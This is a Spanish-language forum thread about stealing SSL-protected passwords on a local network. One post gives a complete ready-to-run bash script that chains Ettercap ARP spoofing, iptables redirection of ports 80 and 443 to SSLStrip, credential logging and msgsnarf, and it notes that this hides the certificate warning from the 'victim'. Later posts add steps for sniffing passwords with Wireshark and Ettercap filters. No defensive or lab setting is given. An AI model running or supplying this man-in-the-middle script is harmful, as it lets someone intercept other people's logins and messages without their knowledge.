Ettercap - Contraseña SSL - Cual es mejor forma?

Iniciado por SokarTefnut, 6 Marzo 2011, 22:23 PM

0 Miembros y 2 Visitantes están viendo este tema.

UsuarioEquis

#10
Yo utilizo el ettercap para arpspoofing y para snifear, y luego redirijo los puerto 80 y 443 al sslstrip, porque si lo dejo que lo haga el ettercap, a la victima le aparece en el browser una advertencia de certificado erróneo.

Aca te dejo un script que arme, create un archivo snifeototal.sh y pega el contenido del texto que escribo a continuación, luego de grabar #chmod 777 snifeototal.sh
y por ultimo #./snifeototal.sh, espero que te sirva.

texto a copiar:

echo
echo "Full Sniffing-----------------"
echo "-------------by Usuario Equis"
echo
echo -n "Adaptador de RED: "
read -e ADAPT
echo -n "Puerta de Enlace o Gateway: "
read -e GATEW
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -F
xterm -geometry 75x75+1+1 -T "ARP Spoofing con Ettercap" -e ettercap -Tq -M arp:remote /$GATEW/ // -P autoadd -i $ADAPT -m /tmp/capturaetter.log
sleep 1
iptables -t nat -L -n
sleep 1
iptables -t nat -D PREROUTING 1
iptables -t nat -D PREROUTING 1
iptables -t nat -L -n
sleep 1
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p tcp --dport 443 -j  REDIRECT --to-port 10000
xterm -geometry 75x35+1+100 -T "SSLStrip" -e sslstrip -k -l 10000 -a -w /tmp/captura.log
sleep 1
xterm -geometry 75x35+1+200 -T "Visualizacion del Log" -e tail -f /tmp/captura.log
xterm -geometry 75x35+1+300 -T "Visualizacion del Log de Ettercap" -e tail -f /tmp/capturaetter.log
xterm -geometry 75x35+1+400 -T "Messenger" -e msgsnarf -i $ADAPT




Hwftk

Hay un problema con Ettercap y Sslstrip, al ejecutar Sslstrip saltan demasiados errores y pasa lo mismo con Ettercap con un archivo lipcap y demás sockers, le pasa a alguien también? Saludos
Prefiero estar frente a mi computadora que salir al parque.

alpha015

Olvidaros de Ettercap, dá muchos problemas. Instalad SSLStrip 0.9 en Backtrack 5 R1. Ponedlo a correr y lanzad el arp-spoofing, entonces se desencriptarán todas las páginas. Sí queréis interceptar las contraseñas tan sólo tenéis que sniffear con Wireshark. Un saludo.

Uxio

Cita de: alpha015 en 19 Septiembre 2011, 14:57 PM
Olvidaros de Ettercap, dá muchos problemas. Instalad SSLStrip 0.9 en Backtrack 5 R1. Ponedlo a correr y lanzad el arp-spoofing, entonces se descifrarán todas las páginas. Sí queréis interceptar las contraseñas tan sólo tenéis que sniffear con Wireshark. Un saludo.

Añado a tu perfecta guía que los paquetes obtenidos puedes abrirlos con el ettercap (tiene una opción para analizar paquetes ya capturados), que ya tiene varios filtros para devolver passwords y nombres de usuario.

alpha015

#14
Cita de: Uxio en 21 Septiembre 2011, 23:23 PM
tu perfecta guía

Ironía en estado puro... tan sólo trato de disminuír los quebraderos de cabeza a los principiantes como yo. Saludos.

Uxio

Cita de: alpha015 en 22 Septiembre 2011, 01:41 AM
Ironía en estado puro... tan sólo trato de disminuír los quebraderos de cabeza a los principiantes como yo. Saludos.

Lo estoy diciendo completamente en serio. Creo que lo has explicado muy bien y de forma muy concisa.

A ver si te crees que lo digo irónicamente porque yo tengo un superprograma que pulso un botón rojo y crackeo SSL, WPA2, y lo que me de la gana. Me has interpretado mal.

alpha015

Cita de: Uxio en 22 Septiembre 2011, 14:32 PM
Lo estoy diciendo completamente en serio. Creo que lo has explicado muy bien y de forma muy concisa.

A ver si te crees que lo digo irónicamente porque yo tengo un superprograma que pulso un botón rojo y crackeo SSL, WPA2, y lo que me de la gana. Me has interpretado mal.

Perdona no sabía, gracias pues... saludos.

Uxio

Cita de: alpha015 en 23 Septiembre 2011, 20:25 PM
Perdona no sabía, gracias pues... saludos.

Ok, no hay problema.